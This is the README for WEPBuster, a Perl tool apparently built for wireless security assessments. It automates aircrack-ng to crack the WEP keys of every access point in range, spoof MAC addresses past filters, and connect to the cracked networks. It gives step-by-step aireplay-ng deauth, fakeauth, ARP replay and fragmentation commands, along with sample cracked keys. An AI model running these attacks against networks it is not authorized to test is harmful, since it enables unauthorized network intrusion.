search

google-code-export / wepbuster

Automatically exported from code.google.com/p/wepbuster
2 stars 4 forks source link

readme

##################################################################################

WEPBuster 1.0

Author: Mark Jayson Alvarez

Date Started: April 2009

DESCRIPTION:

This small utility was written for Information Security Professionals to

aid in conducting Wireless Security Assessment. The program executes

various utilities included in the aircrack-ng suite, a set of tools for

auditing wireless networks, in order to obtain the WEP encryption key of

a wireless access point. aircrack-ng can be obtained from

http://www.aircrack-ng.org

OUTPUT:

(owned.txt)

BSSID CHANNEL SSID KEY TIMESTAMP

00:21:29:7D:5E:EB === 11 === Zakhal === 08:6D:38:15:30 === 1243883642

00:12:29:1D:E1:B3 === 1 === amnah === 68:28:1a:3c:20 === 1243883642

(owned_rtt.txt)

BSSID CHANNEL SSID KEY TIMESTAMP AVERAGE RTT (PACKET LOSS)

00:21:29:7D:5E:EB === 11 === ap1 === 08:6D:38:15:30 === 183642 === 7.2(0% loss)

00:12:29:1D:E1:B3 === 1 === ap2 === 68:28:1a:3c:20 === 124642 === 9.3(10% loss)

(found_ap.txt)

BSSID CHANNEL SSID

00:21:29:7D:5E:EB 11 Zakhal

00:12:29:1D:E1:B3 1 amnah

USAGE:

perl wepbuster [channel/s] (or any combination, space separated )"

perl wepbuster (sort | connect) [HOST | IP] (Defaults to: gateway)"

Typically, one would invoke the program without any arguments. Doing this

will set the mode to 'crack' and will try to crack all wep-enabled access

points within the range on each of those non-overlapping channels depending

on which country was specified (1, 6, 11 for US) and (1, 5, 9, 13 for EU)

Given an argument of numbers, mode will be set to 'crack' and will crack all

APs on those particular channel/s specified.

If passed with a 'sort' argument, followed by an optional IP address or a

hostname, the program will try to sort the list of cracked access points

(obtained after running 'crack' mode) in the order of increasing ping round

trip time to the gateway or to the IP address or hostname specified.

If passed with a 'connect' argument, followed by an optional IP address or a

hostname, the program will try to connect to each access point included in

in the list of cracked access points. The program exits once connection is

verified, e.g, if it can successfully ping the gateway or the IP address or

hostname specified.

RECOMMENDED MODIFICATIONS (OPTIONAL):

Starting with 1.0 beta_0.6, wepbuster now works with the vanilla aircrack-ng

releases (aircrack-ng 1.0 rc4 and above). The first modification to the

source code of aircrack-ng will increase the accuracy in terms of

the number of IVs needed in order to crack the WEP key. The second one will

shorten the amount of time aireplay-ng will wait before trying a new data

packet for fragmentation attack.

1.) Instead of 5000, change PTW_TRY_STEP to 100 to tell aircrack-ng to start

cracking the WEP key again (from a previous failed attempt) as soon as it

has collected 100 new IVs.

Look for this line below in "aircrack-ng.h"

PTW_TRY_STEP #5000

2.) When IVs did not go beyond 300 after 30 sleeps, wepbuster will try

aireplay-ng's fragmentation attack (-5).

To shorten the amount of tries when there is no answer from the AP,

change "round > 10" to "round > 2"

PCT; printf("No answer, repeating...\n");

....

....

if (round > 10)

In most occassions, fragmentation attack results in a very quick creation

of forged arp packets that can be used for arp replay attack which is a

fast way to generate unique IVs for the quickest WEP cracking technique so

far, the PTW attack. Changing the value above will further increase the

speed of fragmentation attack.

REQUIREMENTS:

- aircrack-ng 1.0 rc4 and above

- perl installation with standard libraries (threading support)

- perl modules (http://search.cpan.org)

- Term::ReadKey

- Expect.pm

- macchanger (www.alobbs.com/macchanger)

- miscellaneous unix programs

- ifconfig, iwconfig, rm, pkill, stty, cp, touch, mv, route, ping,

dhclient, netstat

TESTING PLATFORM:

During the development, this program was tested inside an Ubuntu Linux

installation, using Alfa AWUS036H with R8187 driver.

The access points tested were Aztech DSL605EW and Linksys WAG54G2

WARNINGS:

Other linux platforms, were not tested. The wireless card mentioned above

is the only card that was used, others are not guaranteed to work without

making any changes. I don't have all the necessary hardwares to test.

I'm leaving this work to the community. Please contribute so that everyone

can benefit.

FINAL THOUGHTS:

This is the first program I have provided to the opensource community.

I hope you'll find it useful. Donations are welcome if you do =).

Send them to my paypal account: markjayson.alvarez@gmail.com

Please use this program in a good way and remember:

"Morality works best when chosen not when mandated"

- Larry Wall

Author, Perl Programming Language

LINKS

Project Page: http://code.google.com/p/wepbuster

Demo Videos: http://www.youtube.com/user/wif1bust3r

##################################################################################

Steps Taken During The Program Execution:

The following steps provides a detailed breakdown of the steps taken during the program execution. This should be read along the actual source code.

  1. Run airmon-ng and put each wireless card into monitor mode, obtaining the monitor interface name created in the process

  2. Obtain the macaddress by parsing ifconfig(8) output

  3. Argument verification:

    • Can accept 'sort' and 'connect' followed by an optional IP address or a hostname
    • Can accept either combination of 1, 6, 11 for US non-overlapping channels and 1, 5, 9, 13 for EU non-overlapping channels
    • If no valid channels were entered, defaults to all channels on the $country specified

  4. Verify existence of cracked APs list ("owned.txt") before running 'sort' or 'connect' mode.

  5. Scan each of the specified channels for certain duration and build an overall list of wep-enabled access points including all the clients currently associated to each.

    airodump-ng monitor_interface -t wep -c channel -n -w $filename 2>&1

  6. Verify that at least one access point was found during the initial scan, before proceeding.

  7. Read the list of cracked APs (if there is any), so that later, we can skip APs that have been cracked already. It is also useful for modes 'sort' and 'connect' so that we will know if we can connect to an AP (given the existence of the key)

  8. Read the list of "bad APs" (if there's any). If this list exists, those APs listed will be skipped. Useful in case the program stalls on an unusually behaving AP.

  9. Read the list of "known APs" (if there's any). If this list exists, only those APs that are listed will be processed. Useful to avoid illegally cracking APs that we're not allowed to.

  10. Process the modes: 10.1 MODE 'CRACK'

    • process "bad APs" list. Skip the AP if it is listed.

    • process "known APs" list. Skip the AP if it is not listed.

    • process "cracked APs" list. Skip AP if it is included in the list and at most 15 days old since the day the key was found

    • REVEAL HIDDEN SSID

    • Send deauth broadcast for 3 times.

      aireplay-ng -0 1 -a bssid inject_interface -h mac_address 2>&1

      If there's any associated clients found in the initial scan, send each client directed deauth plus 2 deauth broadcast only.

      aireplay-ng -0 1 -a bssid inject_interface -h mac_address -c client_macaddress 2>&1

      User can press 'enter' key to send two more deauth broadcasts.

    • If the SSID cannot be revealed, just name it as 'hidden'

    • pkill airodump-ng and aireplay-ng just to make sure no other aircrack process is running before we begin.

    • delete all dump files in the current directory.

    • set the channel and rate

    • CHECK FOR MAC ADDRESS FILTERING and SHARED KEY AUTHENTICATION

    • Do an initial fakeauth and check if AP is using mac filtering or SKA.

      'aireplay-ng -1 1 -a bssid inject_interface -e 'ssid' -h mac_address -D 2>&1'

    • If AP is filtered, check if we have any associated client to spoof our mac address with.

    • If there is, spoof our mac using "macchanger", otherwise, skip the AP.

    • Run fakeauth with keep-alives (reassociate every 15 minutes) in the background

    'aireplay-ng -1 900 -o 1 -q 10 -a bssid inject_interface -e 'ssid' -h mac_address'

    • Run airodump in the background and dump only data destined to the AP

      'airodump-ng monitor_interface -t wep -u 20 -d bssid -c channel --output-format pcap,csv -w inject_dump 2>&1'

    • Run arp replay attack in the background

      'aireplay-ng inject_interface -3 -b bssid -h mac_address 2>&1'

    • KEEP COUNTING IVs EVERY 1 SLEEP AND DISPLAY THE COUNT EVERY 5 SLEEPS

    • if IV count is less than 100 after 10 sleeps, send deauth broadcast twice with 2 sleeps interval

      'aireplay-ng -0 1 -a bssid inject_interface -h mac_address'

    • if IV count is less than 300 after 30 sleeps, try fragmentation attack (-5) for $frag_timeout seconds (unless there is no at all IV) Note that we're only reading a copy of the collected dump so far.

    'aireplay-ng -5 inject_interface -b bssid -r inject_dump-01.cap.tmp -h mac_address'

    • if attack was successful, we build an arp packet using the keystream found

      'packetforge-ng -0 -a bssid -h mac_address -k 255.255.255.255 -l 255.255.255.255 -y keystream_xor -w forged_arp.cap'

    • then we replay it for 3 seconds. (we already have an aireplay-ng -3 running so we only need this one until the first aireplay-ng -3 picks up our forged arp.

    'aireplay-ng inject_interface -3 -r forged_arp.cap -b bssid -h mac_address 2>&1'

    • when fragmentation exits, either because it has ran out of data or it has timed out, we launch rebroadcast attack (-p 0841)

      'aireplay-ng inject_interface -2 -p 0841 -b bssid -c FF:FF:FF:FF:FF:FF -h mac_address 2>&1'

    • after 20 minutes and we're still trying... This is taking forever, we'll skip the ap

    • BEGIN CRACKING THE KEY

    • if we have collected $min_iv (17000) start cracking the key using aircrack-ng.

      'aircrack-ng -q -b 'bssid' inject_dump-01.cap'

    • add the key in "cracked APs (owned.txt)" list once found

    • if key cannot be found after $crack_timeout (15 minutes), skip the AP

    • If we suddently get an error code while injecting, skip the AP. Possible presence of WIPS

    10.2 MODE 'SORT'

    • Verify if the AP is included in the list of owned APs. If it is not, we cannot connect to it because we don't have the key, therefore, we won't be able to get the RTT. So we'll skip it.
    • If we have the key, will get the RTT w/packet loss and record it. The RTT refers to our gateway RTT or if we have specified a host, we'll get the ping RTT of that instead. e.g, "perl wepbuster sort www.google.com"
    • Once we have all the RTT for each AP, sort them and write the output into "owned_rtt.txt"
    • Finally, rearrange "owned.txt" such that the order of the APs follows that of the "owned_rtt.txt"

    10.3 MODE 'CONNECT'

    • read "owned.txt" sequencially and connect to each. Connection will be verified if we can ping the gateway or whatever host we specified in the command line. e.g, "perl wepbuster connect www.google.com"
    • once connected to an AP, we're done.

  11. During mode sort and connect, when testing for connectivity, we initially set our IP address manually to 192.168.1.150 and gateway to 192.168.1.1. If we cannot 'connect', we try to obtain IP address via DHCP using dhclient.